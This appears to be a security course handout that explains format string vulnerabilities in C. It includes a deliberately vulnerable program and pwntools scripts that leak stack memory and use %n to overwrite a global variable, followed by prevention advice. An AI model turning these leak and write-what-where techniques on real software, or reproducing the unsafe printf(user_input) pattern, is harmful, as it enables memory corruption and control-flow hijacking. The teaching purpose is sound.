In these notes, we introduce the concept of format string vulnerabilities and describe how they can be used to both leak information from memory and modify arbitrary locations with arbitrary values (i.e., a write-what-where primitive). In short, string format vulnerabilities offer opportunities beyond what is possible for a simple buffer overflow.
What Happens When the Attacker Controls the Format String
One of the most common functions used in c is printf
. In introductory Systems
courses we learn how to read input from a file or stdin, perform some string
manipulation, and display the result on the command line using printf
. Most
of the time, you’ve used format specifiers—such as %s
for strings, %d
for
integers, and %f
for floats—which are matched with some number of variables
to print the value of those variables. Note: the information below also applies
to other functions that use format strings, such as sprintf
and fprintf
.
However, when there are more format specifiers than variables things can go wrong. In the worst case, such a mistake might allow an attacker to read from or write into arbitrary memory locations.
Consider the following 32-bit C program.
#include<stdio.h>
int main() {
char buffer[64] = "%s %s";
printf(buffer, "Hello", "World\n");
}
The output of this program is:
Hello World
The first argument passed to printf
is the format string. In this example,
buffer
is the format string and it specifies that printf
should substitute
strings for the %s
format specifiers; the specific strings are determined by
the second and third arguments passed to printf
.
A quick look at the disassembly, and our prior knowledge of C calling
conventions, tells us what arguments are passed to printf
and how.
0x080484aa <+63>: push 0x8048560
0x080484af <+68>: push 0x8048567
0x080484b4 <+73>: lea eax,[ebp-0x4c]
0x080484b7 <+76>: push eax
0x080484b8 <+77>: call 0x8048330 <printf@plt>
In particular, the first two instructions push the third and second arguments
to printf
to the stack, i.e., the addresses of the "Hello"
and "World\n"
strings. Those strings are static values stored in the text section of the
virtual address space. The next two instructions setup and push the first
argument, i.e., the address of the buffer
char array which contains the
format string.
One interesting property of printf
is that it can be called with a variable
number of arguments. For example, we could have modified the call to only use
two arguments as follows:
printf("%s", "Hello");
In other words, when printf
executes, it does not immediately know how many
arguments were passed to the function. To determine how many arguments it was
passed, printf
must parse the format string. But what happens when the
format string is wrong? For example, consider the following code:
char buffer[64] = "%s %s";
printf(buffer);
In this program, printf
is only passed a single argument: the address of the
string %s %s
. The printf
function will parse this string, see the format
specifiers calling for two additional strings to be printed, and look for the
addresses of those two strings on the stack. However, no such strings exist
and, consequently, printf
will grab the four bytes from the stack from where
the string addresses should be placed and treat those as string addresses. Possibly,
printf
will trigger a segmentation fault when those invalid pointers
are dereferenced.
Let’s consider a slightly altered version of this program:
char buffer[64] = "%x %x";
printf(buffer);
Like before, printf
will look for the (missing) arguments on the stack, but
this time the format string contains a different pair of format specifiers,
%x
. This specifier tells printf
to print the hexadecimal representation of
the two arguments as if those arguments were unsigned integers.
Now let’s switch over to thinking like an attacker. If an attacker can control
the format string passed to printf
, change that format string to contain the
%x
format specifier, then she can force the program to print values from
stack memory. While such memory leaks may seem of little consequence, these
leaks can provide the attacker with the information she needs to bypass
defenses like stack canaries and ASLR!
Using Format Strings to Enable Arbitrary Writes
The format string problem extends beyond leaking memory. In particular,
printf
has another interesting format specifier, %n
, which writes the
number of characters printed by printf
prior to reaching the %n
to an
address specified by the next argument. To make this behavior more concrete,
consider the following code:
int value;
printf("what's my age again??? %n \n", &value);
printf(value = %d\n", value)
The output of this is:
what's my age again???
value = 23
The value of 23 is number of characters preceding the %n
in the string
what's my age again??? %n \n
. Keep in mind that %n
records the number of
characters printed to the screen, not necessarily the number of characters in
the format string itself. Other printf
formatting features can influence the
number of characters printed to the screen.
In the previous example we provided the address of the value
variable, but
what if the programmer forgot to include this argument? For example:
printf("what's my age again??? %n \n");
This is essentially the same scenario we discussed previously with our strings
example: printf
will parse the format string, see the %n
, interpret the
word at the appropriate location on the stack as the address argument, try to
write to the location specified by this address, and most likely trigger a
segmentation fault.
At this point you might be thinking: “Hmmm, if I can control the format string
argument to printf
, and I can leverage that ability to also control how many
characters are written via printf
. Consequently, I can write an arbitrary
value via %n
. Further, if I can control values on the stack, then I can
control the address written to by %n
. In short, I have a write-what-where
primitive.” If you were thinking this, then you would be correct. A
write-what-where vulnerability can be very powerful for the attacker, e.g., she
can hijack the control-flow by targeting entries in the global offset table.
Simple Example
Consider how we might exploit a binary with the following C code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void vuln(char *s) {
printf(s);
if(target) {
printf("you have modified the target :)\n");
}
}
int main(int argc, char **argv) {
vuln(argv[1]);
}
Let’s try to apply some of the knowledge we gained from above. Let’s focus on
the line printf(s)
in function vuln()
. The s
argument is a
value that we (as the attacker) control. Further, because it is the first
argument to printf
, s
is treated as a format string by printf
. In
short, this looks like a format string vulnerability.
To confirm, let’s write out a pwntools script that provides the binary with a format string that prints out values on the stack:
from pwn import *
context.clear(arch="i386")
p = process("./vuln")
p.sendline('aaaa' + ' %x'*15)
p.interactive()
We should see output similar to the following:
aaaa 40 f7fc25a0 0 f7ffd000 f7ffd918 ffffd280 ffffd374 0 ffffd314 f7fc2000 61616161 20782520 25207825 78252078 20782520
We can take the end of this sequence of hex characters and write code to interpret these values as ascii as follows:
from pwn import *
print unhex("61616161 20782520 25207825 78252078 20782520".replace(' ',''))
When run, this code will give us:
aaaa x% % x%x% x x%
If we account for transposition due to alignment and endianness (remember that
we are telling printf
to treat successive sets of four bytes as unsigned
integers), this string looks like part of our input. In other words, we
managed to leak enough memory to find our own input string on the stack!
Specifically, the 11th %x
specifier printed out the start of our input
string.
Let’s clean this code up just a bit, using some additional features of printf
, to only
print out the first four bytes of our input string:
p = process("./vuln")
p.sendline('aaaa' + ' %11$x')
p.interactive()
If we change the %11$x
to %11$n
, printf
will attempt to write to the
number of printed characters to the address 0x61616161, i.e., aaaa
.
At this point, we know: 1) this program has a format string vulnerability, 2) we have control over the format string, and 3) we can control some values on the stack.
If we use “%n” as part of our input and are clever in how we construct our
format string, then we can directly control where on the stack printf
looks
for the %n
address argument. That is, we can control the address of the write.
For this challenge, we want to change the value of the global variable target
and, thus, we want our %n
to trigger a write to target
. Fortunately, we do
not need to worry about what value gets written there (as long as it is not
zero).
There are many ways to figure out the address of target
—for example
objdump -t binary | grep target
—but let’s use another pwntools feature to
help us.
Putting it all together, we have the following solution:
b=ELF("./vuln")
log.info("target at: " + hex(b.symbols.target))
exploit_str = pack(b.symbols.target) + ' %11$n'
p = process("./vuln")
p.sendline(exploit_str)
p.interactive()
Preventing Format String Vulnerabilities
The simplest approach to avoiding this type of attack is to pass your own
static format string to printf
. For example, instead of printf(user_input)
it is safer to use printf("%s", user_input)
. Here, if an attacker passes
format characters as their input printf
will simply interpret read
it as a string literal—no sensitive information will be leaked and no
values on the stack are overwritten.
Modern compilers will often warn of usage format string usage, so be sure to heed the warnings!
Illustrating the Behavior of %n
The following code snippet, which you should run yourself, illustrates some
of the behaviors of the %n
format specifier that often confuse students.
#include<stdio.h>
int main() {
int count = 0;
// Count will be 4
printf("abcd%n", &count);
printf("\nCount: %d %x\n", count, count);
// Count should be 4 after this call, as the %n does not
// count characters from previous calls to printf
printf("abcd%n", &count);
printf("\nCount: %d %x\n", count, count);
//Count 5 because len("hello") is five
printf("%s%n", "Hello", &count);
printf("\nCount: %d %x\n", count, count);
// Count 256, padded with spaces
printf("%256s%n", "Hello", &count);
printf("\nCount: %d %x\n", count, count);
// Count 0, hex(256) == 0x0100
count = 0;
printf("%256s%hhn", "Hello", (char *)&count);
printf("\nCount: %d %x\n", count, count);
// Count 0, hex(256) == 0x0100
// These lines behave the same as the example above,
// but gcc will throw up warnings
//count = 0;
//printf("%256s%hhn", "Hello", &count);
//printf("\nCount: %d %x\n", count, count);
// Count: 16776960 ffff00
count = 0xffffff;
printf("%256s%hhn", "Hello", (char *)&count);
printf("\nCount: %d %x\n", count, count);
// Count: 16711935 ff00ff
count = 0xffffff;
printf("%256s%hhn", "Hello", (char *)&count + 1);
printf("\nCount: %d %x\n", count, count);
}
Other Resources on the Topic
For more information about format strings and associated attacks, consider taking a look at the following link(s).
- https://stackoverflow.com/questions/18681078/in-which-memory-segment-command-line-arguments-get-stored